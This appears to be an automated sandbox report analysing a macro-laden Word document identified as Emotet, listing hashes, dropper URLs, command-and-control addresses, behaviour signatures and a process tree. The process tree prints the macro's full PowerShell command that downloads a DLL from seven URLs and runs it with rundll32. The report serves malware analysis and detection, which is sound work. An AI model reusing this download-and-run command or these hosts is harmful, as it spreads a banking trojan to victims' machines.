Analysis

  • max time kernel
    146s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    16-04-2022 05:40

General

  • Target

    hcnpldfh.docm

  • Size

    140KB

  • MD5

    391dca4cf91ae12aa1b5ac9d0ac3ec41

  • SHA1

    47cfcf587d838f68a8f8df53ea3afae475436992

  • SHA256

    06012c700c1dac4c122303e920fdf1c71c41e681673c241c9698e5766df275a8

  • SHA512

    de299156048c8cb81fe9a5e839442347d118b9de47b353500647a73d4b97f010dcef6d6eb3c7ee9b04874010efd0b9f3b8790f8f9013a47271528eaed1be0c41

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://evgeniys.ru/sap-logs/D6/

exe.dropper

http://crownadvertising.ca/wp-includes/OxiAACCoic/

exe.dropper

https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/

exe.dropper

http://immoinvest.com.br/blog_old/wp-admin/luoT/

exe.dropper

https://yoho.love/wp-content/e4laFBDXIvYT6O/

exe.dropper

https://www.168801.xyz/wp-content/6J3CV4meLxvZP/

exe.dropper

https://www.pasionportufuturo.pe/wp-content/XUBS/

Extracted

Family

emotet

Botnet

Epoch4

C2

91.200.186.228:443

191.252.196.221:8080

94.177.248.64:443

66.42.55.5:7080

103.8.26.103:8080

185.184.25.237:8080

103.8.26.102:8080

178.79.147.66:8080

58.227.42.236:80

45.118.135.203:7080

103.75.201.2:443

195.154.133.20:443

45.142.114.231:8080

212.237.5.209:443

207.38.84.195:8080

104.251.214.46:8080

212.237.17.99:8080

212.237.56.116:7080

216.158.226.206:443

110.232.117.186:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 30 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\hcnpldfh.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4684
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3464
        • C:\Windows\SysWow64\rundll32.exe
          "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\1016556424.dll,f1693273254
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1744
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\1016556424.dll",Control_RunDLL
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:4376
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qmspsbjzisipwes\irrtauralv.mmx",qFBbXZKpAC
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:208
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qmspsbjzisipwes\irrtauralv.mmx",Control_RunDLL
                7⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                PID:564

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\1016556424.dll
    Filesize

    252KB

    MD5

    03cf2b47f1e3c28f53d18d95aacbe545

    SHA1

    7ddab9ffa7c1a7f35e4ef64bb4b6a0b5a297c5d4

    SHA256

    338fee41186fbb5d35a973843ae1a77138bd2102475d81405b64b4c800a7b149

    SHA512

    736f631ef6f6460b618fa56db2717aac073dd4a36c652f994c28dca1fcaed3d88350c91f29c7500e9063e316f83a27282f2c1ed7f4bb372f2acc82d772a69f55

  • C:\ProgramData\1016556424.dll
    Filesize

    252KB

    MD5

    03cf2b47f1e3c28f53d18d95aacbe545

    SHA1

    7ddab9ffa7c1a7f35e4ef64bb4b6a0b5a297c5d4

    SHA256

    338fee41186fbb5d35a973843ae1a77138bd2102475d81405b64b4c800a7b149

    SHA512

    736f631ef6f6460b618fa56db2717aac073dd4a36c652f994c28dca1fcaed3d88350c91f29c7500e9063e316f83a27282f2c1ed7f4bb372f2acc82d772a69f55

  • C:\ProgramData\1016556424.dll
    Filesize

    252KB

    MD5

    03cf2b47f1e3c28f53d18d95aacbe545

    SHA1

    7ddab9ffa7c1a7f35e4ef64bb4b6a0b5a297c5d4

    SHA256

    338fee41186fbb5d35a973843ae1a77138bd2102475d81405b64b4c800a7b149

    SHA512

    736f631ef6f6460b618fa56db2717aac073dd4a36c652f994c28dca1fcaed3d88350c91f29c7500e9063e316f83a27282f2c1ed7f4bb372f2acc82d772a69f55

  • C:\Windows\SysWOW64\Qmspsbjzisipwes\irrtauralv.mmx
    Filesize

    252KB

    MD5

    03cf2b47f1e3c28f53d18d95aacbe545

    SHA1

    7ddab9ffa7c1a7f35e4ef64bb4b6a0b5a297c5d4

    SHA256

    338fee41186fbb5d35a973843ae1a77138bd2102475d81405b64b4c800a7b149

    SHA512

    736f631ef6f6460b618fa56db2717aac073dd4a36c652f994c28dca1fcaed3d88350c91f29c7500e9063e316f83a27282f2c1ed7f4bb372f2acc82d772a69f55

  • C:\Windows\SysWOW64\Qmspsbjzisipwes\irrtauralv.mmx
    Filesize

    252KB

    MD5

    03cf2b47f1e3c28f53d18d95aacbe545

    SHA1

    7ddab9ffa7c1a7f35e4ef64bb4b6a0b5a297c5d4

    SHA256

    338fee41186fbb5d35a973843ae1a77138bd2102475d81405b64b4c800a7b149

    SHA512

    736f631ef6f6460b618fa56db2717aac073dd4a36c652f994c28dca1fcaed3d88350c91f29c7500e9063e316f83a27282f2c1ed7f4bb372f2acc82d772a69f55

  • memory/208-149-0x0000000000000000-mapping.dmp
  • memory/564-151-0x0000000000000000-mapping.dmp
  • memory/564-153-0x0000000010000000-0x0000000010028000-memory.dmp
    Filesize

    160KB

  • memory/1744-147-0x0000000010000000-0x0000000010028000-memory.dmp
    Filesize

    160KB

  • memory/1744-142-0x0000000000000000-mapping.dmp
  • memory/2648-137-0x0000000000000000-mapping.dmp
  • memory/3464-139-0x000001E1885C0000-0x000001E1885E2000-memory.dmp
    Filesize

    136KB

  • memory/3464-140-0x00007FFE02440000-0x00007FFE02F01000-memory.dmp
    Filesize

    10.8MB

  • memory/3464-141-0x000001E1A18D0000-0x000001E1A2076000-memory.dmp
    Filesize

    7.6MB

  • memory/3464-138-0x0000000000000000-mapping.dmp
  • memory/4376-148-0x0000000010000000-0x0000000010028000-memory.dmp
    Filesize

    160KB

  • memory/4376-145-0x0000000000000000-mapping.dmp
  • memory/4684-155-0x00007FFDED470000-0x00007FFDED480000-memory.dmp
    Filesize

    64KB

  • memory/4684-158-0x00007FFDED470000-0x00007FFDED480000-memory.dmp
    Filesize

    64KB

  • memory/4684-133-0x00007FFDED470000-0x00007FFDED480000-memory.dmp
    Filesize

    64KB

  • memory/4684-132-0x00007FFDED470000-0x00007FFDED480000-memory.dmp
    Filesize

    64KB

  • memory/4684-130-0x00007FFDED470000-0x00007FFDED480000-memory.dmp
    Filesize

    64KB

  • memory/4684-131-0x00007FFDED470000-0x00007FFDED480000-memory.dmp
    Filesize

    64KB

  • memory/4684-135-0x00007FFDEADC0000-0x00007FFDEADD0000-memory.dmp
    Filesize

    64KB

  • memory/4684-156-0x00007FFDED470000-0x00007FFDED480000-memory.dmp
    Filesize

    64KB

  • memory/4684-136-0x00007FFDEADC0000-0x00007FFDEADD0000-memory.dmp
    Filesize

    64KB

  • memory/4684-157-0x00007FFDED470000-0x00007FFDED480000-memory.dmp
    Filesize

    64KB

  • memory/4684-134-0x00007FFDED470000-0x00007FFDED480000-memory.dmp
    Filesize

    64KB